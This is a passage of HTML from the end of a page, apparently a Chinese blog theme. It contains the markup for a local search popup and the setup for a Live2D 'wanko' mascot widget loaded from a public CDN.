</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div id="local-search-result"></div></div></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"https://cdn.jsdelivr.net/npm/live2d-widget-model-wanko@1.0.5/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body></html>